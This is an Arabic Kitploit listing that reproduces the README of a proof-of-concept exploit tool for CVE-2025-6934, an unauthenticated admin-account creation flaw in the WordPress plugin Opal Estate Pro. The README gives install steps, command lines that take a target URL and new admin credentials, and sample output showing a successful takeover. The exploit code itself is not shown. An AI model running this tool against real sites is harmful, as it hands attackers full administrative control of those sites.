Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-6934-PoC — أداة استغلال CVE-2025-6934 — إنشاء حساب مسؤول بدون مصادقة في إضافة ووردبريس Opal Estate Pro | Kitploit
أدوات/GitHubGitHub/mejbankadir/cve-2025-6934-poc
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubmejbankadir/cve-2025-6934-poc

CVE-2025-6934-PoC

أداة استغلال CVE-2025-6934 — إنشاء حساب مسؤول بدون مصادقة في إضافة ووردبريس Opal Estate Pro

عرض المستودع
منذ 5 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🔓 أداة استغلال CVE-2025-6934

إنشاء حساب مسؤول بدون مصادقة في إضافة ووردبريس Opal Estate Pro


Python PyQt6 Status License

تم إنشاء وتطوير هذا المشروع بالكامل بواسطة mejbankadir (SMH tech و Mejban HackSheild تحت مظلة NexoAmicus)


📋 الوصف

CVE-2025-6934 هي ثغرة أمنية حرجة في إضافة ووردبريس Opal Estate Pro (الإصدارات <= 1.7.5) تسمح للمهاجمين غير المُصادَق عليهم بإنشاء حسابات مسؤول على مواقع ووردبريس المعرضة للخطر.

توفر هذه الأداة نسختين: CLI (واجهة سطر الأوامر) وGUI (واجهة المستخدم الرسومية) لاستغلال هذه الثغرة.


⚠️ تفاصيل الثغرة


🛠️ التثبيت

المتطلبات الأساسية

root@kitploit:~
# Clone the repository
git clone https://github.com/mejbankadir/CVE-2025-6934.git
cd CVE-2025-6934

# Install dependencies
pip install -r requirements.txt

المتطلبات

root@kitploit:~
requests
beautifulsoup4
colorama
PyQt6        # For GUI version only

🚀 الاستخدام

إصدار الواجهة الرسومية (موصى به)

root@kitploit:~
python3 CVE-2025-6934-GUI.py

ميزات الواجهة الرسومية:

  • واجهة عصرية بسمة داكنة
  • عرض تقدم الاستغلال في الوقت الفعلي
  • إخراج ملون لوحدة التحكم
  • التحقق من صحة الإدخال
  • تنفيذ غير مُعطِّل (Non-blocking)

إصدار سطر الأوامر

root@kitploit:~
python3 CVE-2025-6934.py -u http://target.com -mail [email protected] -password P@ssw0rd123

الوسائط:

root@kitploit:~
-u, --url        Target URL (required)
-mail, --newmail Email for admin account (required)
-password, --newpassword Password for admin account (required)
-user, --username Username for admin account (default: administrator)

📖 مثال

root@kitploit:~
┌─────────────────────────────────────────────────────────────┐
│  _____________   _______________                            │
│  \_   ___ \   \ /   /\_   _____/                           │
│  /    \  \/\   Y   /  |    __)_   ______                   │
│  \     \____\     /   |        \ /_____/                   │
│   \______  / \___/   /_______  /                           │
│           \/                  \/                           │
│                                                             │
│          CVE-2025-6934 Exploit PoC                         │
│                                                             │
│  Created and developed fully by mejbankadir                │
│  (SMH tech and Mejban HackSheild Under NexoAmicus)        │
└─────────────────────────────────────────────────────────────┘

مثال لسطر الأوامر

root@kitploit:~
$ python3 CVE-2025-6934.py -u http://example.com -mail [email protected] -password MyP@ss123

[•] Starting Exploit Attempt...
[•] Nonce Found: a1b2c3d4e5f6...
[✔] Exploit Successful!
    Username : administrator
    Email    : [email protected]
    Password : MyP@ss123
    Role     : administrator

🎨 الميزات

إصدار سطر الأوامر

  • ✅ شعار ASCII (Banner)
  • ✅ إخراج ملون (باستخدام colorama)
  • ✅ التحقق من الإصدار
  • ✅ استخراج الـ Nonce
  • ✅ معالجة استجابات JSON

إصدار الواجهة الرسومية

  • ✅ واجهة عصرية بسمة داكنة
  • ✅ إخراج وحدة التحكم في الوقت الفعلي
  • ✅ التحقق من صحة الإدخال
  • ✅ تنفيذ في خيط خلفي (Background thread)
  • ✅ شريط الحالة
  • ✅ تصميم متجاوب

🔒 إشعار أمني

⚠️ تحذير: تم توفير هذه الأداة لأغراض التعليم واختبار الأمان المصرح به فقط.

الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني وغير أخلاقي.

باستخدامك لهذه الأداة، فأنت توافق على:

  • اختبار الأنظمة التي تمتلكها فقط، أو التي لديك إذن صريح باختبارها
  • عدم استخدام هذه الأداة لأغراض خبيثة
  • تحمل كامل المسؤولية عن أي عواقب قانونية

📝 الاعتمادات

الدورالاسم
المُنشئ والمطوّرmejbankadir
المنظمةSMH tech و Mejban HackSheild تحت مظلة NexoAmicus

📂 هيكل المشروع

root@kitploit:~
CVE-2025-6934/
├── CVE-2025-6934.py       # CLI version
├── CVE-2025-6934-GUI.py   # GUI version
├── CVE-2025-6934.yaml     # Documentation
├── requirements.txt       # Python dependencies
└── README.md             # This file

🐛 استكشاف الأخطاء وإصلاحها

أخطاء شهادات SSL

تقوم الأداة تلقائيًا بتعطيل تحذيرات SSL. إذا واجهت مشكلات:

root@kitploit:~
requests.packages.urllib3.disable_warnings()

فشل استخراج الـ Nonce

  • تأكد من صحة رابط الهدف (URL)
  • تحقق من تثبيت إضافة Opal Estate Pro
  • تحقق من أن الموقع يعمل بواسطة WordPress

📜 الترخيص

رخصة MIT

حقوق النشر (c) 2025 mejbankadir (SMH tech و Mejban HackSheild تحت مظلة NexoAmicus)


صُنع بكل ❤️ بواسطة mejbankadir

SMH tech | Mejban HackSheild | تحت مظلة NexoAmicus

تنزيل الأداة
الخاصيةالقيمة
معرف CVECVE-2025-6934
الخطورةحرجة (CVSS 3.1: 9.8)
الإضافة المتأثرةOpal Estate Pro
الإصدارات المتأثرة<= 1.7.5
نوع الثغرةإنشاء حساب مسؤول بدون مصادقة
متجه CVSSAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H